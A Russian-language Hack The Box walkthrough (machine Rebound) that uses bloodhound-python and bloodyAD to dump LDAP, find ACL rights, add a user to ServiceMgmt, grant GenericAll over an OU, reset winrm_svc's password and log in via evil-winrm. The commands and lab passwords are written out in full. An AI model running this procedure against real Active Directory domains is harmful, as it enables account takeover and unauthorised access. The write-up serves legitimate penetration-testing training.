Продолжим прохождение уязвимой машины Rebound с площадки Hack The Box. В предыдущей статье рассмотрели пример атак Kerberoasting и AS-REP Roasting. Сегодня покажу, как использовать инструмент bloodyAD для работы с LDAP на Kali Linux.
Еще по теме: Пример использования Certify и Certipy с AD CS
Использование bloodyAD для работы с LDAP на Kali Linux
Теперь, когда у нас есть валидные учетные записи, собираем данные для BloodHound. Для этого используем скрипт на Python. Но сначала обновим запись в файле /etc/hosts и синхронизируем время с удаленным хостом.
1 |
10.10.11.231 rebound.htb dc01.rebound.htb |
1 2 |
sudo timedatectl set-ntp false sudo ntpdate -s 10.10.11.231 |
1 |
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb -c All |
Отмечаем подконтрольных нам пользователей как Owned и проводим анализ. Но к сожалению, ничего интересного найти не удалось. Тогда попробуем сдампить базу LDAP и проверить разрешения вручную. Для работы с LDAP я использую скрипт bloodyAD.
1 |
python3 bloodyAD.py -u ldap_monitor -d rebound.htb -p '1GR8t@$$4u' --host rebound.htb get search 'DC=rebound,DC=htb' --resolve-sd > ldap_dump.txt |
База сохранена в файл ldap_dump.txt, из которого отфильтруем все строки, содержащие имена и SID подконтрольных пользователей.
1 |
cat ldap_dump.txt | grep -i 'ldap_monitor\|S-1-5-21-4078382237-1492182817-2568127209-7681\|oorend\|S-1-5-21-4078382237-1492182817-2568127209-7682' |
Так как нас интересуют только разрешения, остановимся на первой строке вывода. Открываем текстовый редактор и находим ее через поиск. Этот ACL относится к объекту ServiceMgmt.
Таким образом, пользователь oorend (SID S-1-5-21-40…7682) может добавлять пользователей в группу ServiceMgmt. Пометим эту группу как Owned и для поиска дальнейшего пути снова попытаем удачу в графе BloodHound, на этот раз успешно.
У пользователей этой группы есть все права на подразделение SERVICE USERS, к которому относится юзер winrm_svc. Значит, можно взять под контроль пользователя winrm_svc в три этапа.
Этап первый. Добавить пользователя oorend в группу ServiceMgmt.
1 |
python3 bloodyAD.py -u oorend -d rebound.htb -p '1GR8t@$$4u' --host rebound.htb add groupMember ServiceMgmt oorend |
Этап второй. Добавить пользователю oorend все права на членов подразделения SERVICE USERS.
1 |
python3 bloodyAD.py -u oorend -d rebound.htb -p '1GR8t@$$4u' --host rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend |
Этап третий. Установить пользователю winrm_svc свой пароль.
1 |
python3 bloodyAD.py -u oorend -d rebound.htb -p '1GR8t@$$4u' --host rebound.htb set password winrm_svc 'Ralf!@34' |
А теперь используем установленные учетные данные для авторизации в службе WinRM.
1 |
evil-winrm -i rebound.htb -u winrm_svc -p 'Ralf!@34' |
ПОЛЕЗНЫЕ ССЫЛКИ: